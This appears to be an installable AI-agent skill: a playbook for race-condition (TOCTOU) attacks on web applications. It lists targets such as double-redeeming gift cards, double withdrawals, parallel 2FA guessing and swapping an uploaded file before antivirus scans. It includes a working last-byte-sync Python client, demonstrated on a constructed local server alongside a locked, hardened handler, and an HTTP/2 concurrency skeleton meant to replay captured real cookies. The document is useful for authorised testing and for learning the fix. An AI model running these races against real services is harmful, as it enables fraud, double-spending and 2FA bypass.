racelisted
Install: claude install-skill Wulan234/agent
# Race / TOCTOU playbook
Confirm the target is in scope for stress-style testing (multiple parallel requests can look like abuse). Then identify the candidate operation.
Execution rule: capture a real request for the operation and replay that request with concrete cookies/body values. Never write literal placeholders such as `<sess>` to files; ask once if a session or replayable request is missing.
## Targets worth racing
- Redeem a gift card / promo code (does the second redeem succeed?)
- Cast a vote / claim a one-per-user reward
- Withdraw / transfer balance (does it deduct twice?)
- Submit a 2FA code (do N parallel guesses all get checked before the failed-attempt counter increments?)
- Apply a discount that's supposed to be once-per-cart
- Send a friend / invite request (creates duplicate rows / privileges)
- Confirm an email (race a confirmation against an address change: does the verified flag land on an address the token was never issued for?)
- Upload then read a file (write `safe.png`, then race a swap to `evil.svg` before AV scans)
## 1. Burp-style "single packet attack" (last-byte sync) — preferred
HTTP/2 multiplexes many requests over one TCP connection, and that is what makes the trick work: send N requests with every byte serialized *except* the last, then release the final byte of all N in a single TCP write. The server receives all N completions in the same packet and hands them to workers within microseconds of each other. The point is removing network jitter, not defeating rate limiting: a race window of a few milliseconds is unreachable when each request arrives on its own packet, and trivially hit when they all land at once. Over HTTP/1.1 the same idea runs on N separate connections ("last-byte sync"); it is noisier, since the N final bytes go out as N small packets, but still far tighter than firing complete requests in a loop.
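The hold-and-release described above, applied to the "redeem a gift card" target from the list, as an added example that is not the skill's own code: a constructed in-process HTTP/1.1 server with a check-then-act `/redeem` handler, a last-byte-sync client over N connections, and the same handler hardened so the check and the write happen under one lock. The endpoint, the code value `GIFT-1234` and the simulated latency are all made up for the demo; against a real target the raw request would be the captured one the execution rule asks for.

```python
"""Last-byte-sync race against a check-then-act "redeem" endpoint.

Added example, not code from the original skill. Everything is constructed:
the in-process HTTP server, its /redeem handler and the promo code value.
Over HTTP/1.1 the synchronisation uses one TCP connection per request; the
HTTP/2 single-packet variant withholds the last frame of each stream instead.
"""
import socket
import threading
import time
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

CODE = "GIFT-1234"      # constructed promo code
used = {CODE: False}    # stands in for the gift_cards.redeemed column
lock = threading.Lock()


class Redeem(BaseHTTPRequestHandler):
    atomic = False  # a subclass flips this for the hardened variant

    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0))).decode()
        code = body.partition("=")[2]
        if self.atomic:
            # hardened: check and mark under one lock (a DB would do
            # UPDATE ... WHERE redeemed = 0 and look at the affected-row count)
            with lock:
                ok = used.get(code) is False
                if ok:
                    used[code] = True
        else:
            ok = used.get(code) is False   # time of check
            if ok:
                time.sleep(0.2)            # simulated DB round-trip
                used[code] = True          # time of use: the TOCTOU gap
        msg = b"OK" if ok else b"ALREADY_USED"
        self.send_response(200 if ok else 409)
        self.send_header("Content-Length", str(len(msg)))
        self.end_headers()
        self.wfile.write(msg)

    def log_message(self, *args):  # silence per-request logging
        pass


def last_byte_sync(host, port, raw_request, n):
    """Open n connections, send every byte but the last on each, then release
    the withheld bytes back-to-back so all n requests complete at once."""
    socks = []
    for _ in range(n):
        s = socket.create_connection((host, port))
        s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)  # no Nagle delay
        s.sendall(raw_request[:-1])
        socks.append(s)
    time.sleep(0.1)  # let every partial request reach the server and park on its body read
    for s in socks:
        s.send(raw_request[-1:])  # the release: n final bytes within microseconds
    bodies = []
    for s in socks:
        data = b""
        while chunk := s.recv(4096):  # server speaks HTTP/1.0 and closes after one response
            data += chunk
        s.close()
        bodies.append(data.split(b"\r\n\r\n", 1)[1])
    return bodies


def run_demo(atomic, n=10):
    """Start a fresh server, race n redeems of CODE, return how many succeeded."""
    used[CODE] = False
    handler = type("Handler", (Redeem,), {"atomic": atomic})
    srv = ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    host, port = srv.server_address
    body = f"code={CODE}".encode()
    req = (
        f"POST /redeem HTTP/1.1\r\nHost: {host}:{port}\r\n"
        f"Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\nConnection: close\r\n\r\n"
    ).encode() + body
    try:
        replies = last_byte_sync(host, port, req, n)
    finally:
        srv.shutdown()
        srv.server_close()
    return sum(r == b"OK" for r in replies)


if __name__ == "__main__":
    print("vulnerable:", run_demo(atomic=False), "of 10 redeems succeeded")
    print("hardened:  ", run_demo(atomic=True), "of 10 redeems succeeded")
```

Every handler thread has already parsed the headers and is blocked on the final body byte when the release happens, so the N checks run in the same instant and all pass before the first write lands; the locked variant returns exactly one `OK` because the check and the write can no longer interleave.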
You can do this with a small Go or Python script, or with tooling that already implements it: Burp Repeater's "Send group in parallel (single-packet attack)" and Turbo Intruder with `engine=Engine.BURP2` plus a `gate` both do the hold-and-release for you. The skeleton below (Python, HTTP/2 via httpx) only fires N requests concurrently on one connection; httpx gives no way to withhold the final byte, so it reproduces the parallelism but not the packet-level synchronisation. Use it as a quick first probe and switch to a real single-packet implementation when the window is tight:
```python
import asyncio
import httpx  # needs the h2 extra: pip install "httpx[http2]"

async def race(url, n, **req):
    # n identical requests on one HTTP/2 connection; pass the real cookies/body captured from the target
    async with httpx.AsyncClient(http2=True) as client:
        return await asyncio.gather(*(client.post(url, **req) for _ in range(n)))
```